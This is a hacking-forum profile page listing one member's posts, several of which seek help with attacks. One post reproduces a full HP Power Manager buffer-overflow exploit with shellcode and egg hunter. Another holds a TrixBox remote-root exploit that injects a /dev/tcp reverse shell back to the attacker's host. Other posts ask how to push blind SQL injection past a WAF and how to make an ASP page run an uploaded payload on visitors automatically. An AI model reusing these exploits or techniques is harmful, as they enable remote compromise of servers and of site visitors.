Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - pl4f0rd

Pages: [1] 2
1
Hacking and Security / Re: Issues with airodump-ng Vbox
« on: November 30, 2015, 03:53:37 pm »
the command airodump-ng wlan0mon should work i would have thought or airodump-ng phy0

2
Hacking and Security / Re: Issues with airodump-ng Vbox
« on: November 30, 2015, 03:09:57 pm »
Realtek wireless chips always have worked for me with Kali, but yeah as above, don't bridge your device.

3
General discussion / Re: InfoSec Weekly Roundtable/Discussion
« on: November 30, 2015, 01:48:39 pm »
pretty neat idea

4
Hacking and Security / Blind SQL with WAF
« on: December 24, 2014, 01:53:30 pm »
Hi guys, I came across this application which is using a WAF on certain strings and has some preg_match and preg_replace functions.

Anyway I have managed to get some results although very simple, instead of the usual ' or 1=1 -- i am using the following (1)or(1)=(1) which returns 5 pictures, when i change it to (1)or(1)=(2) then I just get the one picture.

How can i increases on this and start to gather database information?  So im struggling to construct and order by or union.

Thanks

5
Hacking and Security / Re: Help getting exploit working
« on: July 19, 2011, 07:17:40 pm »
yes, tried that, this is needed as it's the unique string for th egg hunter which has to be placed before the shellcode.  It's kind of a marker.

It's been baffling me for a few days now  :o



6
Hacking and Security / Help getting exploit working
« on: July 19, 2011, 06:09:26 pm »
I need to get this working on a Windows 7 box

The RET address is universal

The box is exploitable

I think it's something to do with the Egg Hunter appended "n00bn00b"

Any help would be appreciated 
      •    
Code: [Select]
import sys
from socket import *
 
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
 
try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()
 
PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
 
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x38"
"\x4e\x56\x46\x32\x46\x42\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x48"
"\x49\x38\x4e\x36\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x43\x4b\x4d"
"\x46\x46\x4b\x38\x43\x54\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x46"
"\x50\x48\x50\x34\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x46\x4a\x36\x43\x43\x44\x33\x4a\x46\x47\x47\x43\x57"
"\x44\x33\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e"
"\x48\x36\x41\x38\x4d\x4e\x4a\x30\x44\x50\x45\x35\x4c\x56\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x45\x43\x35\x43\x34"
"\x43\x35\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x41"
"\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x56\x4a\x46\x43\x36"
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x56\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x34\x4e\x42"
"\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x55\x41\x45\x41\x35\x4c\x56"
"\x41\x30\x41\x55\x41\x45\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")
 
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
 
evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()

7
Hacking and Security / Re: Cracking wifi passwords
« on: July 15, 2011, 11:01:23 pm »
Check out my video http://www.youtube.com/watch?v=XsFVz1K3sZo&feature=fvsr quality is a bit shitty but should get you started. 

8
Great  ;D


Works like a charm


Thanks

9
Well it's deffo running the right version, see screenshot so must be a way to get this code to work some how

10
So you got any ideas on how I can get the session?

11

Have error in below code and not sure why, Im guessing it has something to do with the def find_sessionid part.


Any help would be greatly appreciated


Error below


Code: [Select]
   tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
TypeError: cannot concatenate 'str' and 'NoneType' objects


Code: [Select]
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep
 
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
 
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)
 
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
 
 
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
 
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output
 
def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
            if re.search("Set-Cookie",header):
                    cook=header.split(" ")
            sessionid=cook[1][10:42]
                    print "[*] Session ID is %s" % sessionid
            return sessionid
 
 
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
 
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
 
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
 
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"
 
# milw0rm.com [2008-07-12]


12
.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 05:40:04 pm »
Cheers, I will give it a whirl

13
.NET Framework / Re: ASP code for msfpayload
« on: July 13, 2011, 04:50:17 pm »
Well yeah I got a shell however it's unprivileged and running as IUSR,  I uploaded the exe and to the web server and I navigate to it and manually click on the exe which in turn loads me up a shell via the multi/handler. 


The meterpreter shell times out, cant getsystem, or sysinfo or drop into a shell.


The exe is not asp it's clicked on directly in the Scripts directory and loaded as an exe.


I need an asp page that loads the exe by it's self without me clicking on it., So for example the user navigates to site and the exe is executed. 




14
General discussion / Re: IRC link
« on: July 13, 2011, 04:25:21 pm »
"cannot connec to host. maybe you mispelled it!"

15
General discussion / IRC link
« on: July 13, 2011, 04:12:27 pm »
IRC link no longer works for me.

Pages: [1] 2


Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.